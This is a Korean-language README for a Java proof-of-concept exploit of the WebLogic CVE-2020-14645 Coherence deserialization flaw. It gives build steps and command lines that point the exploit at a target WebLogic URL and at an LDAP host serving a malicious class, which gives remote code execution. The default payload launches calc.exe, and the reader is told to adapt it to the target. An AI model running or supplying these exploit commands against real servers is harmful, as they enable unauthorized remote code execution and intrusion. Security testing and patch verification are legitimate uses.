
WebLogic CVE-2020-14645 Coherence 역직렬화 RCE를 위한 Java PoC입니다. LDAP를 통해 악성 클래스를 호스팅하고 취약한 WebLogic 서버에서 원격 코드 실행을 트리거합니다.
Maven 3
JDK 1.8
mvn package
구체적인 테스트 단계:
이 취약점은 Apache Dubbo 취약점과 유사하므로, 해당 취약점을 참고하여 1-4 단계를 구현하십시오.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# 예시
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
본 예제에서 제공하는 POC를 사용하면, 익스플로잇 성공 후 테스트 대상에서 calc.exe가 실행됩니다. 테스트 대상 환경에 맞게 POC를 직접 수정하십시오.